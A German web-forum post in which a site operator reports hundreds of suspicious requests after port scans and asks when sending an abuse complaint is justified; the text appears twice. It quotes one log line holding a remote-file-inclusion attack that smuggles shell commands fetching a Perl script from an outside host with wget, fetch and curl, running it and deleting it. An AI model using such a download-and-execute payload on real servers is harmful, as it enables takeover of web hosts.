Mordor
Registered User
Mahlzeit allerseits!
Das man hin und wieder mal in den Logfiles komische Sachen finde ist ja normal. Ich hatte Gestern Mittag aber über 800 Http Anfragen mit voranngehenden mehrfachen Portscanns.
Für mich sieht das aus wie Crosssidescriptingversuche:
Das ist zum Beispiel eine davon.
Sonst konnte ich nichts in den Logs finden. Auch die Seite läuft einwandfrei. Anscheinend ist der Angriff nicht ganz geglückt.
die Hauptfrage die sich mir stellt ist, ab wann kann man bedenkenlos eine Abuse-Mail schreiben, ohne dass man sich lächerlich macht. Sind 600 bis 800 Anfragen dieser Art schon gerechtvertigt?
Gruß Mordor
Das man hin und wieder mal in den Logfiles komische Sachen finde ist ja normal. Ich hatte Gestern Mittag aber über 800 Http Anfragen mit voranngehenden mehrfachen Portscanns.
Für mich sieht das aus wie Crosssidescriptingversuche:
Code:
64.40.110.192 - - [22/Mar/2007:13:24:24 +0100] "GET /window.php?action=http://smurf.deep-ice.com/kid.gif?&cmd=wget%20-P%20/tmp%20http://193.94.169.61/WebCalendar/tools/a.pl;perl%20/tmp/a.pl;fetch%20-o%20/var/tmp%20http://193.94.169.61/WebCalendar/tools/a.pl;perl%20/tmp/a.pl;curl%20-o%20/tmp/a.pl%20-O%20http://193.94.169.61/WebCalendar/tools/a.pl;perl%20/tmp/a.pl;rm%20-rf%20/tmp/a.pl;echo/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
Sonst konnte ich nichts in den Logs finden. Auch die Seite läuft einwandfrei. Anscheinend ist der Angriff nicht ganz geglückt.
die Hauptfrage die sich mir stellt ist, ab wann kann man bedenkenlos eine Abuse-Mail schreiben, ohne dass man sich lächerlich macht. Sind 600 bis 800 Anfragen dieser Art schon gerechtvertigt?
Gruß Mordor